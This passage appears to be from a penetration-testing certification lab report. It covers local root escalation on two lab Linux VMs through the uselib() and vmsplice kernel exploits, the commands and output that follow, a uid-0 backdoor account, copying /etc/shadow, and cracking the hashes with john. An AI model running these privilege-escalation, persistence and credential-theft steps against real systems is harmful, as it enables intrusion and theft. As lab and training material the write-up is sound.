User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm, gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntpoperator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshdsync, user, uucp, vcsa, webalizer, xfsFiles that execute as root: /usr/bin/sudo, /usr/sbin/suexec, /sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart, /usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd, /sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh, /usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper, /bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage, /usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp, /usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute, /usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctlUsername/password: user/digital, cptvm1/windows, cptvm2/linux

cptvm2 (192.168.1.104)

Operating system: LinuxKernel version: Linux 2.6.18-8TCP ports: 22, 111, 939TCP services:

22/tcp ssh OpenSSH 4.3 (protocol 2.0)111/tcp rpcbind 2 (rpc #100000)939/tcp status 1 (rpc #100024)

User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus, distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfsFiles that execute as root: /usr/bin/sudo, /usr/bin/sudoedit, /media/.hal-mtab-lock, /usr/sbin/suexec, /usr/bin/Xorg, /usr/bin/chfn, /usr/bin/chsh, /usr/sbin/userhelper, /usr/lib/squid/ncsa_auth, /usr/lib/squid/pam_auth, /bin/mount, /bin/ping, /bin/ping6, /bin/su, /bin/umount, /sbin/mount.nfs, /sbin/mount.nfs4, /sbin/pam_timestamp_check, /sbin/umount.nfs, /sbin/umount.nfs4, /sbin/unix_chkpwd, /usr/bin/at, /usr/bin/chage, /usr/bin/gpasswd, /usr/bin/newgrp, /usr/bin/passwd, /usr/bin/rcp, /usr/bin/rlogin, /usr/bin/rsh, /usr/kerberos/bin/ksu, /usr/libexec/openssh/ssh-keysign, /usr/sbin/ccreds_validate, /usr/sbin/userisdnctl, /usr/sbin/usernetctlUsername/password: cptvm1/windows, cptvm2/linux

G. Penetration of cptvm1

i. Local exploit research via anyside.org

The list of files designated to execute as root was processed to gain

Page 30: Root Password

only the base name of the file. This list would be used to search against the anyside.org exploit list.

$ awk '{ print "basename ", $4 }' suid_root_200.txt > basename_200.txt$ chmod +x basename_200.txt$ ./basename_200.txt | sort -u > basename-2_200.txt$ cat basename-2_200.txtXFree86atchagechfnchshcrontabgpasswdinndstartlppasswdmountnewgrppam_timestamp_checkpasswdpingping6pwdb_chkpwdrcprloginrnewsrshssh-keysignstartinnfeedsusudosuexectraceroutetraceroute6umountunix_chkpwduserhelperuserisdnctlusernetctl

The list of exploits used during the remote exploit search was re-used to search for local exploits on the cptvm1 host.

$ grep exploits\/local exploits_list.txt | grep -w -i -f ../commands/basename-2_200.txt > possible_local_200.txt$ lltotal 1672drwxr-xr-x 7 matt matt 238 Feb 21 14:47 ./drwxr-xr-x 15 matt matt 510 Feb 21 14:47 ../-rw-r--r-- 1 matt matt 126720 Feb 6 14:40 exploits_list.db.tgz-rw-r--r-- 1 matt matt 702666 Sep 21 05:52 exploits_list.txt-rw-r--r-- 1 matt matt 1699 Feb 15 20:34 possible_local_200.txt-rw-r--r-- 1 matt matt 9376 Feb 6 14:43 possible_remote_200.txt

$ cat possible_local_200.txt 2006-07-15;http://www.anyside.org/exp/exploits/local/2006071503.txt;Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit2006-07-15;http://www.anyside.org/exp/exploits/local/2006071502.txt;Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit2006-03-01;http://www.anyside.org/exp/exploits/local/2006030101.txt;Apple Mac OS X (/usr/bin/passwd) Custom Passwd Local Root Exploit2006-01-

Page 31: Root Password

25;http://www.anyside.org/exp/exploits/local/2006012501.txt;SquirrelMail 3.1 Change Passwd Plugin Local Buffer Overflow Exploit2005-11-09;http://www.anyside.org/exp/exploits/local/2005110903.txt;FreeBSD (4.x , < 5.4) master.passwd Disclosure Exploit2005-11-09;http://www.anyside.org/exp/exploits/local/2005110902.txt;Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit2005-11-08;http://www.anyside.org/exp/exploits/local/2005110801.txt;SuSE Linux <= 9.3, 10 (chfn) Local Root Privilege Escalation Exploit2005-07-04;http://www.anyside.org/exp/exploits/local/2005070403.txt;Sudo 1.3.1 - 1.6.8p Pathname Validation Local Root Exploit (openbsd)....;http://www.anyside.org/exp/exploits/local/r57sudo.c;OpenBSD sudo 1.3.1 - 1.6.8p local root exploit....;http://www.anyside.org/exp/exploits/local/x_hpux_11i_nls_cu.c;The same vulnerability to x_hp-ux11i_nls_ct.c,but exploit ping command to get root shell2004-9-19;http://www.anyside.org/exp/exploits/local/sudo-exploit.c;sudo exploit.2004-9-11;http://www.anyside.org/exp/exploits/local/cdrecord-suidshell.sh.txt;cdrecord $RSH exec() SUID Shell Creation....;http://www.anyside.org/exp/exploits/local/xlock-XLOCALEDIR.c;Local root exploit utilizing the overflow in XLOCALEDIR under XFree86 Version 4.2.x using xlock. Written to work on Redhat 7.2.

The results of the search were 13 possible exploits. The “Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit”, “Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit”, “Apple Mac OS X (/usr/bin/passwd) Custom Passwd Local Root Exploit”, “FreeBSD (4.x , < 5.4) master.passwd Disclosure Exploit”, “SuSE Linux <= 9.3, 10 (chfn) Local Root Privilege Escalation Exploit”, “Sudo 1.3.1 - 1.6.8p Pathname Validation Local Root Exploit (openbsd)”, “OpenBSD sudo 1.3.1 - 1.6.8p local root exploit” and “The same vulnerability to x_hp-ux11i_nls_ct.c,but exploit ping command to get root shell” exploits can be ruled out as they are written for operating systems different than the one we are on. The “SquirrelMail 3.1 Change Passwd Plugin Local Buffer Overflow Exploit” and “cdrecord $RSH exec() SUID Shell Creation” exploits can also be ruled out as they are for applications that don't exist on the host.

This leaves us with 3 possible exploits: “Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit”, “sudo exploit.” and “Local root exploit utilizing the overflow in XLOCALEDIR under XFree86 Version 4.2.x using xlock. Written to work on Redhat 7.2.”.

The version of Xfree86 was found to be version 4.3.0. Thus eliminating Xfree86 from the list of potential exploits.

[cptvm1@cptvm1 commands]$ X -version XFree86 Version 4.3.0 (Red Hat Linux release: 4.3.0-2)Release Date: 27 February 2003X Protocol Version 11, Revision 0, Release 6.6Build Operating System: Linux 2.4.20-3bigmem i686 [ELF]Build Date: 27 February 2003Build Host: porky.devel.redhat.com

Page 32: Root Password

Before reporting problems, check http://www.XFree86.Org/ to make sure that you have the latest version.Module Loader presentOS Kernel: Linux version 2.4.20-8 ([email protected]) (gcc version 3.2.2 20030222 (Red Hat Linux 3.2.2-5)) #1 Thu Mar 13 17:54:28 EST 2003

The version of sudo was found to be 1.6.6.

[cptvm1@cptvm1 commands]$ sudo -VSudo version 1.6.6

The version of sudo fits within the requirements for the “ Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit”. So, it was downloaded and the code reviewed. Unfortunately, this exploit relies on an entry within the /etc/sudoers file that points to a file the user has full access to modify. This situation does not exist on the cptvm1 host.

The “sudo exploit” exploit doesn't provide enough information about its requirements to rule it out. Attempting to download the exploit resulted in a 404 error from the anyside.org web site. Without a more detailed description, more research into this exploit was suspended.

ii. Local exploit research via secwatch.org

Searches for exploits of at, chage, chfn, chsh, crontab, lppasswd, mount, newgrp, pam_timestamp_check, passwd, ping, ping6, rcp, rlogin, rnews, rsh, sudo, suexec, traceroute, umount, unix_chckpwd, userhelper and xfree86 returned quite a number of results. Most of the exploits were eliminated due to mismatches on the operating system or version. The remaining exploits, 24 exploits in total, were downloaded, reviewed, compiled and tested. It should be noted that the gcc compiler on the cptvm1 host was named gcc296. To make things easier, a bin directory was created within the “cptvm1” user's home directory, a symbolic link named gcc was created for gcc296 and the bin directory was added to the PATH. No successful exploits for the executables listed above were found.

A search for “inndstart” provided an interesting exploit. Instead of a typical buffer overflow exploit, this exploit was caused by a poorly planned application feature. An environment variable named INNCONF can be defined to point to the location of the inn.conf configuration file. This enables a local user with access to the inndstart program to create their own innd.conf file with a "pathrun" component pointing to a directory owned by root and defining a program of their choosing to be executed as root.

Page 33: Root Password

While this exploit sounded promising, the ability to change the ownership of a directory/file to root is limited on the cptmv1 host. Ultimately, ruling this exploit out.

iii. Privilege escalation using a Kernel VMA exploit

Overall, the secwatch.org site provides a search mechanism that is superior to anyside.org. The secwatch.org search aggregates exploit search results from several other sites into a single result page. Unfortunately, the search mechanism only appears to work optimally with single words. In several cases, a search using multiple words received no results back from secwatch.org. However, when the same search string was entered directly on a site, multiple exploits were found.

With the issues found with the search mechanism of secwatch.org, a switch to milw0rm.com as the primary search site was made. The quality of the exploit code on milw0rm.com appears to be quite a bit better than the code on the other sites that were searched.

A search on milw0rm.com for “linux kernel 2.4” resulted in the following exploits.

Immediately, the “Linux Kernel 2.4.x-2.6.x Assembler Inline Function Local DoS Exploit” exploit can be removed from the list as it isn't a root exploit. The “Linux Kernel 2.4.22 "do_brk()" local Root Exploit (PoC)” exploit can also be removed as the kernel version in use is 2.4.20.

Illustration 1: Milw0rm search results for "linux kernel 2.4".

Page 34: Root Password

This left 5 exploits, “Linux Kernel 2.4/2.6 x86-64 System Call Emulation Exploit”, “Linux Kernel 2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)”, “Linux Kernel 2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit”, “Linux Kernel 2.4 uselib() Privilege Elevation Exploit” and “Linux Kernel 2.4.x mremap() bound checking Root Exploit”. The exploits were taken in order, compiled and executed.

The Tim Hsu, 2005-01-27, “Linux Kernel 2.4 uselib() Privilege Elevation Exploit” resulted in a shell with root access.

[cptvm1@cptvm1 kernel-uselib]$ gcc -o uselib uselib.c[cptvm1@cptvm1 kernel-uselib]$ lltotal 56drwxr-xr-x 2 cptvm1 cptvm1 4096 Jan 28 02:10 ./drwxr-xr-x 42 cptvm1 cptvm1 4096 Feb 14 2009 ../-rwxrwxr-x 1 cptvm1 cptvm1 27027 Jan 28 02:10 uselib*-rw-r--r-- 1 cptvm1 cptvm1 18774 Feb 14 2009 uselib.c[cptvm1@cptvm1 kernel-uselib]$ ./uselib [+] SLAB cleanup child 1 VMAs 32[+] moved stack bfffd000, task_size=0xc0000000, map_base=0xbf800000[+] vmalloc area 0xcfc00000 - 0xdf548000 Wait... -[+] race won maps=58028 expanded VMA (0xbfffc000-0xffffe000)[!] try to exploit 0xd096c000[+] gate modified ( 0xffec9523 0x0804ec00 )[+] exploited, uid=0 sh-2.05b# iduid=0(root) gid=0(root) groups=501(cptvm1)sh-2.05b#

iv. Maintaining access via creation of a new “r00t” account

After the successful use of the Kernel VMA exploit, consistent root access to the cptvm1 host was required.

The creation of a new user account having the same user id and group id as the real root account was accomplished via the standard linux useradd script. After the creation of the account, the password was set to “expl0ited”. While setting the password to a variant of a dictionary word seemed like a good idea, this caused the shadow password cracking phase to take quite a bit longer.

sh-2.05b# envTERM=vt100PWD=/home/cptvm1/cpt/exploits/kernel-uselibSHLVL=1HISTFILE=/dev/null_=/bin/envsh-2.05b# export PATH=/usr/bin:/usr/sbin:/bin:/sbinsh-2.05b# useradd -u 0 -o -g 0 -d /root r00t

Page 35: Root Password

sh-2.05b# passwd r00tChanging password for user r00t.New password:BAD PASSWORD: it is based on a dictionary wordRetype new password:passwd: all authentication tokens updated successfully.sh-2.05b#

v. Gathering the shadow password file

With the successful creation of a method to gain root access in the future, the gathering of the shadow password file could be accomplished. In this case, the shadow password file was copied within the shell created by the Kernel VMA exploit. However, it could have also been gathered via the new “r00t” account. While not required, the groups shadow file was also copied.

sh-2.05b# cp /etc/shadow /tmpsh-2.05b# cp /etc/gshadow /tmpsh-2.05b# chmod a+rw /tmp/shadowsh-2.05b# chmod a+rw /tmp/gshadowsh-2.05b# cd /tmpsh-2.05b# ls -alF gshadow shadow-rw-rw-rw- 1 root root 512 Feb 15 02:15 gshadow-rw-rw-rw- 1 root root 1206 Feb 15 02:15 shadowsh-2.05b#

H. Cracking passwords of the cptvm1 host

i. Cracking of “user”, “cptvm1” and “cptvm2”

With full access to the shadow password file, the process of cracking the passwords contained within was started.

In this case, the “john” utility was used. Within a few minutes the passwords for the user, cptvm1 and cptvm2 user accounts were cracked (not really required as they had already been brute forced). However, the root and r00t accounts took quite a bit longer to crack. While the john session named “cptvm1” was left to run, research on exploits for the cptvm2 host was started.

bt cptvm1 # john --session=cptvm1 shadowLoaded 5 password hash (FreeBSD MD5 [32/32])digital (user)windows (cptvm1)linux (cptvm2)guesses: 3 time: 0:05:24:14 (3) c/s: 5722 trying: tubtSession aborted

bt cptvm1 # john -show shadowuser:digital:14019:0:99999:7:::cptvm1:windows:14019:0:99999:7:::cptvm2:linux:14019:0:99999:7:::

3 password hashes cracked, 2 left

Page 36: Root Password

bt cptvm1 # john --session=cptvm1 --users=root shadowLoaded 1 password hash (FreeBSD MD5 [32/32])

I. Penetration of cptvm2

i. Privilege escalation using a Kernel vmsplice exploit

Since the cptvm1 host fell to a kernel exploit, time was not spent researching third party applications and system utility exploits on the cptvm2 host. A search on milw0rm.com for “linux kernel 2.6” resulted in the following exploits.

Immediately, the “Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1 Local DoS Exploit”, “Linux Kernel 2.6.x sys_timer_create() Local Denial of Service Exploit” and “Linux Kernel 2.6.x Firewall Logging Rules Remote DoS Exploit” exploits can be removed from the list as they aren't root exploits. In addition, the “Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit”, “Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)”, “Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)”, “Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)”, “Linux Kernel 2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate)” and “Linux Kernel 2.6.23 - 2.6.24 vmsplice Local Root Exploit” exploits can also be removed from the list as they aren't for the 2.6.18 version of the kernel.

Illustration 2: Milw0rm search results for "linux kernel 2.6".

Page 37: Root Password

This left 2 exploits, “Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit” and “Linux Kernel 2.6.x chown() Group Ownership Alteration Exploit”. The exploits were taken in order, compiled and executed.

The qaaz, 2008-02-09, “Linux Kernel 2.6.17 – 2.6.24.1 vmsplice Local Root Exploit” resulted in a shell with root access.

[cptvm1@localhost kernel26_vmsplice]$ lltotal 16-rw-r--r-- 1 cptvm1 cptvm1 6293 Feb 15 2009 jessica_biel_naked_in_my_bed.c[cptvm1@localhost kernel26_vmsplice]$ gcc -o jessica_biel_naked_in_my_bed jessica_biel_naked_in_my_bed.c [cptvm1@localhost kernel26_vmsplice]$ lltotal 28-rwxrwxr-x 1 cptvm1 cptvm1 8522 Feb 7 04:05 jessica_biel_naked_in_my_bed-rw-r--r-- 1 cptvm1 cptvm1 6293 Feb 15 2009 jessica_biel_naked_in_my_bed.c[cptvm1@localhost kernel26_vmsplice]$ ./ jessica_biel_naked_in_my_bed----------------------------------- Linux vmsplice Local Root Exploit By qaaz-----------------------------------[+] mmap: 0x0 .. 0x1000[+] page: 0x0[+] page: 0x20[+] mmap: 0x4000 .. 0x5000[+] page: 0x4000[+] page: 0x4020[+] mmap: 0x1000 .. 0x2000[+] page: 0x1000[+] mmap: 0xb7f36000 .. 0xb7f68000[+] root[root@localhost kernel26_vmsplice]# iduid=0(root) gid=0(root) groups=500(cptvm1)[root@localhost kernel26_vmsplice]#

ii. Maintaining access via creation of a new “r00t” account

After the successful use of the Kernel vmsplice exploit, consistent root access to the cptvm2 host was required.

The creation of a new user account having the same user id and group id as the real root account was accomplished via the standard linux useradd script. After the creation of the account, the password was set to “windows”. The previous password generation mistake of setting a “tough” password was not repeated.

[root@localhost kernel26_vmsplice]# envSSH_AGENT_PID=3134HOSTNAME=localhost.localdomainTERM=xtermSHELL=/bin/bashDESKTOP_STARTUP_ID=HISTSIZE=1000GTK_RC_FILES=/etc/gtk/gtkrc:/home/cptvm1/.gtkrc-1.2-gnome2WINDOWID=48234577USER=cptvm1

Page 38: Root Password

LS_COLORS=no=00:fi=00:di=00;34:ln=00;36:pi=40;33:so=00;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=00;32:*.cmd=00;32:*.exe=00;32:*.com=00;32:*.btm=00;32:*.bat=00;32:*.sh=00;32:*.csh=00;32:*.tar=00;31:*.tgz=00;31:*.arj=00;31:*.taz=00;31:*.lzh=00;31:*.zip=00;31:*.z=00;31:*.Z=00;31:*.gz=00;31:*.bz2=00;31:*.bz=00;31:*.tz=00;31:*.rpm=00;31:*.cpio=00;31:*.jpg=00;35:*.gif=00;35:*.bmp=00;35:*.xbm=00;35:*.xpm=00;35:*.png=00;35:*.tif=00;35:SSH_AUTH_SOCK=/tmp/ssh-aqCddQ3075/agent.3075GNOME_KEYRING_SOCKET=/tmp/keyring-euEoqc/socketUSERNAME=cptvm1SESSION_MANAGER=local/localhost.localdomain:/tmp/.ICE-unix/3075PATH=/usr/kerberos/sbin:/usr/bin:/usr/sbin:/bin:/sbin:/usr/kerberos/bin:/usr/local/bin:/usr/bin:/bin:/usr/X11R6/bin:/home/cptvm1/binDESKTOP_SESSION=defaultMAIL=/var/spool/mail/cptvm1GDM_XSERVER_LOCATION=localPWD=/home/cptvm1/cpt/exploits/kernel26_vmspliceINPUTRC=/etc/inputrcXMODIFIERS=@im=noneLANG=en_US.UTF-8GDMSESSION=defaultSSH_ASKPASS=/usr/libexec/openssh/gnome-ssh-askpassSHLVL=3HOME=/home/cptvm1GNOME_DESKTOP_SESSION_ID=DefaultLOGNAME=cptvm1CVS_RSH=sshDBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-yuVqOWjtSW,guid=f9418d49bbcbb5875e2b080cbf709f00LESSOPEN=|/usr/bin/lesspipe.sh %sDISPLAY=:0.0HISTFILE=/dev/nullG_BROKEN_FILENAMES=1XAUTHORITY=/tmp/.gdmI40NOUCOLORTERM=gnome-terminal_=/usr/bin/env[root@localhost kernel26_vmsplice]# useradd -u 0 -o -g 0 -d /root r00tuseradd: warning: the home directory already exists.Not copying any file from skel directory into it.[root@localhost kernel26_vmsplice]# passwd r00tChanging password for user r00t.New UNIX password: BAD PASSWORD: it is based on a dictionary wordRetype new UNIX password: passwd: all authentication tokens updated successfully.[root@localhost kernel26_vmsplice]#

iii. Gathering the shadow password file

With the successful creation of a method to gain root access in the future, the gathering of the shadow password file could be accomplished. In this case, the shadow password file was copied within the shell created by the Kernel vmsplice exploit. However, it could have also been gathered via the new “r00t” account.

[root@localhost kernel26_vmsplice]# cp /etc/shadow /tmp[root@localhost kernel26_vmsplice]# chmod a+rw /tmp/shadow[root@localhost kernel26_vmsplice]# cd /tmp[root@localhost tmp]# ls -alF shadow-rw-rw-rw- 1 root root 1235 Feb 7 04:08 shadow[root@localhost tmp]#

Page 39: Root Password

J. Cracking passwords of the cptvm2 host

i. Cracking of “cptvm1”, “cptvm2”, “root” and “r00t”

The cracking of the cptvm2 accounts was trivial in comparison to the time the cptvm1 host had already taken (over 10 hours). Using only the default dictionary within john, the entire process took just over 6 minutes to complete. This was due to the existence of the root password within the standard john wordlist.

bt cptvm2 # john --session=cptvm2 shadowLoaded 4 password hashes with 4 different salts (FreeBSD MD5 [32/32])admin (root)windows (cptvm1)windows (r00t)linux (cptvm2)guesses: 4 time: 0:00:06:13 (3) c/s: 4533 trying: linux

bt cptvm2 # john -show shadowroot:admin:14019:0:99999:7:::cptvm1:windows:14019:0:99999:7:::cptvm2:linux:14019:0:99999:7:::r00t:windows:14282:0:99999:7:::

4 password hashes cracked, 0 left

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: LinuxKernel version: 2.4.20-8TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770TCP services:

7/tcp echo21/tcp ftp vsftpd 1.1.322/tcp ssh OpenSSH 3.5p1 (protocol 1.99)23/tcp telnet Linux telnetd79/tcp finger Linux fingerd80/tcp http Apache httpd 2.0.40 (Red Hat Linux)109/tcp POSSIBLY pop2110/tcp pop3 ipopd 2001.78rh111/tcp rpcbind 2 (rpc #100000)143/tcp imap UW Imapd 2001.315rh199/tcp smux Linux SNMP multiplexer443/tcp ssl/http Apache httpd 2.0.40 (Red Hat Linux)686/tcp rquotad 1-2 (rpc #100011)993/tcp imaps995/tcp pop3s6000/tcp X1132768/tcp status 1 (rpc #100024)32770/tcp mountd 1-3 (rpc #100005)

UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683UDP services:

7/udp echo13/udp daytime37/udp time (32 bits)111/udp rpcbind 2 (rpc #100000)123/udp ntp

Page 40: Root Password

161/udp snmp SNMPv1 server (public)162/udp snmptrap631/udp unknown683/udp rquotad 1-2 (rpc #100011)

User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm, gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntpoperator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshdsync, user, uucp, vcsa, webalizer, xfsFiles that execute as root: /usr/bin/sudo, /usr/sbin/suexec, /sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart, /usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd, /sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh, /usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper, /bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage, /usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp, /usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute, /usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctlUsername/password: user/digital, cptvm1/windows, cptvm2/linux

cptvm2 (192.168.1.104)

Operating system: LinuxKernel version: Linux 2.6.18-8TCP ports: 22, 111, 939TCP services:

22/tcp ssh OpenSSH 4.3 (protocol 2.0)111/tcp rpcbind 2 (rpc #100000)939/tcp status 1 (rpc #100024)

User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus, distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfsFiles that execute as root: /usr/bin/sudo, /usr/bin/sudoedit, /media/.hal-mtab-lock, /usr/sbin/suexec, /usr/bin/Xorg, /usr/bin/chfn, /usr/bin/chsh, /usr/sbin/userhelper, /usr/lib/squid/ncsa_auth, /usr/lib/squid/pam_auth, /bin/mount, /bin/ping, /bin/ping6, /bin/su, /bin/umount, /sbin/mount.nfs, /sbin/mount.nfs4, /sbin/pam_timestamp_check, /sbin/umount.nfs, /sbin/umount.nfs4, /sbin/unix_chkpwd, /usr/bin/at, /usr/bin/chage, /usr/bin/gpasswd, /usr/bin/newgrp, /usr/bin/passwd, /usr/bin/rcp, /usr/bin/rlogin, /usr/bin/rsh, /usr/kerberos/bin/ksu, /usr/libexec/openssh/ssh-keysign, /usr/sbin/ccreds_validate, /usr/sbin/userisdnctl, /usr/sbin/usernetctlUsername/password: cptvm1/windows, cptvm2/linux, r00t/windows, root/admin

K. Cracking passwords of the cptvm1 host – round 2

i. Cracking of “root” and “r00t”

At this point, the john utility had been running for quite some time without success. With such a difference in the amount of john run time between the vptvm1 and cptvm2 hosts, research into why was begun.

Comparing the default wordlist used by john to the one that had been used during the brute force hydra attack showed that the john wordlist was far smaller. The original assumption was that the default john wordlist would most likely be optimized for password cracking. Therefore, the default wordlist was used as is.

As all of the passwords discovered so far were standard dictionary words, it seemed logical that the rest of the passwords would most

Page 41: Root Password

likely be dictionary words, too. With this in mind, a larger wordlist would be required. To generate this wordlist, the aspell master english dictionary was dumped, cleaned up and sorted. This resulted in a dictionary of roughly 118,000 words.

bt passwords # aspell dump master | sed s/\'//g | sort -u > matt.txtbt passwords # wc -l matt.txt118051 matt.txtbt passwords # mv matt.txt 118051wordDictionary.txtbt passwords # ll 118051wordDictionary.txt-rw-r--r-- 1 503 503 1097205 Feb 15 23:05 118051wordDictionary.txt

With this new approach in mind, additional john sessions were created to use the googled password.txt file and the newly generated aspell dumped file. The results were far more impressive than anticipated. Within 2 seconds, the password for the root account had been cracked.

bt cptvm1 # john --session=cptvm1-3 --users=root --wordlist=../passwords/118051wordDictionary.txt shadowLoaded 1 password hash (FreeBSD MD5 [32/32])cavalry (root)guesses: 1 time: 0:00:00:02 100% c/s: 5511 trying: cavalry

At this point, the john session that had been started to use the googled password.txt file as a wordlist was aborted.

bt cptvm1 # john --session=cptvm1-2 --users=root --wordlist=../passwords/passwords.txt shadowLoaded 1 password hash (FreeBSD MD5 [32/32])guesses: 0 time: 0:00:00:22 100% c/s: 5502 trying: Ôªø!

In addtion, the initial john session was also aborted. I want those 11 hours of my life back, certification crew! :)

bt cptvm1 # john --session=cptvm1 --users=root shadowLoaded 1 password hash (FreeBSD MD5 [32/32])guesses: 0 time: 0:10:53:47 (3) c/s: 5722 trying: 35885297Session aborted

Since we already know that the password to the r00t account is expl0ited, this last step wasn't really required. However, to be 100% complete, a john session was started to crack the r00t account. I cheated and placed the “expl0ited” password in the wordlist. As expected, john was able to crack the password in near record time.

bt cptvm1 # rm cptvm1.rec

bt cptvm1 # john --session=cptvm1 --users=r00t --wordlist=../passwords/118051wordDictionary.txt shadowLoaded 1 password hash (FreeBSD MD5 [32/32])expl0ited (r00t)guesses: 1 time: 0:00:00:09 100% c/s: 4707 trying: expl0ited

Page 42: Root Password

Ultimately, all of the cptvm1 account passwords were cracked.

bt cptvm1 # john -show shadowroot:cavalry:14019:0:99999:7:::user:digital:14019:0:99999:7:::cptvm1:windows:14019:0:99999:7:::cptvm2:linux:14019:0:99999:7:::r00t:expl0ited:14272:0:99999:7:::

5 password hashes cracked, 0 left

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: LinuxKernel version: 2.4.20-8TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770TCP services:

7/tcp echo21/tcp ftp vsftpd 1.1.322/tcp ssh OpenSSH 3.5p1 (protocol 1.99)23/tcp telnet Linux telnetd79/tcp finger Linux fingerd80/tcp http Apache httpd 2.0.40 (Red Hat Linux)109/tcp POSSIBLY pop2110/tcp pop3 ipopd 2001.78rh111/tcp rpcbind 2 (rpc #100000)143/tcp imap UW Imapd 2001.315rh199/tcp smux Linux SNMP multiplexer443/tcp ssl/http Apache httpd 2.0.40 (Red Hat Linux)686/tcp rquotad 1-2 (rpc #100011)993/tcp imaps995/tcp pop3s6000/tcp X1132768/tcp status 1 (rpc #100024)32770/tcp mountd 1-3 (rpc #100005)

UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683UDP services:

7/udp echo13/udp daytime37/udp time (32 bits)111/udp rpcbind 2 (rpc #100000)123/udp ntp161/udp snmp SNMPv1 server (public)162/udp snmptrap631/udp unknown683/udp rquotad 1-2 (rpc #100011)

User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm, gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntpoperator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshdsync, user, uucp, vcsa, webalizer, xfsFiles that execute as root: /usr/bin/sudo, /usr/sbin/suexec, /sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart, /usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd, /sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh, /usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper, /bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage, /usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp, /usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute, /usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctl

Page 43: Root Password

Username/password: user/digital, cptvm1/windows, cptvm2/linux, r00t/expl0ited, root/cavalry

cptvm2 (192.168.1.104)

Operating system: LinuxKernel version: Linux 2.6.18-8TCP ports: 22, 111, 939TCP services:

22/tcp ssh OpenSSH 4.3 (protocol 2.0)111/tcp rpcbind 2 (rpc #100000)939/tcp status 1 (rpc #100024)

